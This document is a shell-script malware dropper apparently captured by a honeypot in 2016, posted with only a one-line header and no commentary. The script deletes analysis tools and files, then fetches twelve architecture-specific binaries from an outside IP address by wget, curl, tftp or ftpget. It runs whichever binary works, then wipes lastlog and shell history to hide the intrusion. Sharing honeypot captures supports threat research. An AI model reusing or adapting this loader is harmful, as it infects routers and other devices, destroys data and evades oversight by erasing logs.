Honeypot Payload! Seen on: 2016-06-05 14:55

#!/bin/sh

busybox rm -rf /usr/bin/strings || rm -rf /usr/bin/strings
busybox rm -rf /usr/bin/ps || rm -rf /usr/bin/ps

# Delete any current files, because not all routers have much storage space
rm -f * || busybox rm -f *

# Wget/cURL our binaries
wget -q http://166.62.120.73/1 || curl -s -O http://166.62.120.73/1 || busybox wget -q http://166.62.120.73/1 || busybox tftp -r 1 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 1 || busybox ftpget 166.62.120.73 1 1
wget -q http://166.62.120.73/2 || curl -s -O http://166.62.120.73/2 || busybox wget -q http://166.62.120.73/2 || busybox tftp -r 2 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 2 || busybox ftpget 166.62.120.73 2 2
wget -q http://166.62.120.73/3 || curl -s -O http://166.62.120.73/3 || busybox wget -q http://166.62.120.73/3 || busybox tftp -r 3 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 3 || busybox ftpget 166.62.120.73 3 3
wget -q http://166.62.120.73/4 || curl -s -O http://166.62.120.73/4 || busybox wget -q http://166.62.120.73/4 || busybox tftp -r 4 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 4 || busybox ftpget 166.62.120.73 4 4
wget -q http://166.62.120.73/5 || curl -s -O http://166.62.120.73/5 || busybox wget -q http://166.62.120.73/5 || busybox tftp -r 5 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 5 || busybox ftpget 166.62.120.73 5 5
wget -q http://166.62.120.73/6 || curl -s -O http://166.62.120.73/6 || busybox wget -q http://166.62.120.73/6 || busybox tftp -r 6 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 6 || busybox ftpget 166.62.120.73 6 6
wget -q http://166.62.120.73/7 || curl -s -O http://166.62.120.73/7 || busybox wget -q http://166.62.120.73/7 || busybox tftp -r 7 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 7 || busybox ftpget 166.62.120.73 7 7
wget -q http://166.62.120.73/8 || curl -s -O http://166.62.120.73/8 || busybox wget -q http://166.62.120.73/8 || busybox tftp -r 8 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 8 || busybox ftpget 166.62.120.73 8 8
wget -q http://166.62.120.73/9 || curl -s -O http://166.62.120.73/9 || busybox wget -q http://166.62.120.73/9 || busybox tftp -r 9 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 9 || busybox ftpget 166.62.120.73 9 9
wget -q http://166.62.120.73/10 || curl -s -O http://166.62.120.73/10 || busybox wget -q http://166.62.120.73/10 || busybox tftp -r 10 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 10 || busybox ftpget 166.62.120.73 10 10
wget -q http://166.62.120.73/11 || curl -s -O http://166.62.120.73/11 || busybox wget -q http://166.62.120.73/11 || busybox tftp -r 11 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 11 || busybox ftpget 166.62.120.73 11 11
wget -q http://166.62.120.73/12 || curl -s -O http://166.62.120.73/12 || busybox wget -q http://166.62.120.73/12 || busybox tftp -r 11 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 12 || busybox ftpget 166.62.120.73 12 12

# Set file permissions
chmod +x * || busybox chmod +x *

# Run correct binary for current architecture
./1 || ./2 || ./3 || ./4 || ./5 || ./6 || ./7 || ./8 || ./9 || ./10 || ./11 || ./12

# Delete our files
rm -f * || busybox rm -f *

# Clean up
>/var/log/lastlog
>/etc/lastlog
rm -f ~/.bash_history || busybox rm -f ~/.bash_history
history -c